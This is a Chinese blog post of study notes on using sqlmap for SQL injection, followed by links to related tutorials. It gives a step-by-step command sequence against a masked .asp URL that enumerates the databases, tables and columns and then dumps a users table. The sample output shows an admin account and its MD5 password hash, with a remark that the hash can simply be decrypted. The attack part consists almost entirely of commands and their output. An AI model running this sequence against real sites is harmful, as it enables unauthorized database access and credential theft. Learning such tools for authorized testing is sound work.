2.羽翼sqlmap学习笔记之MySQL注入
2014-11-22 21:26
447 查看
1.判断一个url是否存在注入点:
假设找到数据库:student
2.获取数据库中的表名:
假设找到表名:users
3.获取表中的字段名:
假设获取出字段为:id username password
4.猜字段内容:
获取结果:
账号:admin 密码:将密文解密即可。
.sqlmap.py -u "http://abcd****efg.asp?id=7" -dbs
假设找到数据库:student
------------------------------ available databases[1] [*] student ------------------------------
2.获取数据库中的表名:
.sqlmap.py -u "http://abcd****efg.asp?id=7" -D student --tables
假设找到表名:users
----------------------- [INFO] retrieved:users -----------------------
3.获取表中的字段名:
.sqlmap.py -u "http://abcd****efg.asp?id=7" -D student -T users --columns
假设获取出字段为:id username password
--------------------------------- [INFO] retrieved: id [INFO] retrieved: int(3) [INFO] retrieved: username [INFO] retrieved: varchar(30) [INFO] retrieved: password [INFO] retrieved: varchar(30) ----------------------------------
4.猜字段内容:
.sqlmap.py -u "http://abcd****efg.asp?id=7" -D student -T users -C id,username,password --dump
获取结果:
[INFO] retrieved: 1 [INFO] retrieved: admin [INFO] retrieved: 21232f297a57a5a743894a0e4a801fc3 (32位MD5加密密文)
账号:admin 密码:将密文解密即可。
相关文章推荐
- 1.羽翼sqlmap学习笔记之Access注入
- 4.羽翼sqlmap学习笔记之Post登录框注入
- 羽翼sqlmap课程学习笔记
- 【安全牛学习笔记】SQLMAP- 自动注入
- mysql学习笔记(八):防止sql注入
- 【安全牛学习笔记】SQLMAP自动注入-REQUEST
- 学习笔记 UpdateXml() MYSQL显错注入
- 3.羽翼sqlmap学习笔记之Cookie注入
- 【安全牛学习笔记】课时94 SQLMAP自动注入-REQUEST和SQLMAP自动注入-OPTIMIZATION
- sqlmap 随笔 羽翼sqlmap学习笔记
- 【安全牛学习笔记】SQLMAP自动注入-ENUMERATION、BRUTE FORCE、UDF INJECTION、FILE SYSTEM、OS、WINDOWS REGISTORY、GENERAL、M
- 【安全牛学习笔记】mysql注入总结
- 【安全牛学习笔记】SQLMAP- 自动注入
- 【安全牛学习笔记】SQLMAP自动注入-INHECTION、DETECTION、TECHNIQUES、FINGERPRINT
- 【安全牛学习笔记】SQLMAP自动注入-REQUEST
- 学习笔记 MYSQL报错注入(count()、rand()、group by)
- Mysql注入学习笔记(一)
- 【安全牛学习笔记】SQLMAP自动注入-ENUMERATION、BRUTE FORCE、UDF IN
- MySQL学习笔记(较全面的)
- mysql学习笔记(二) ----维护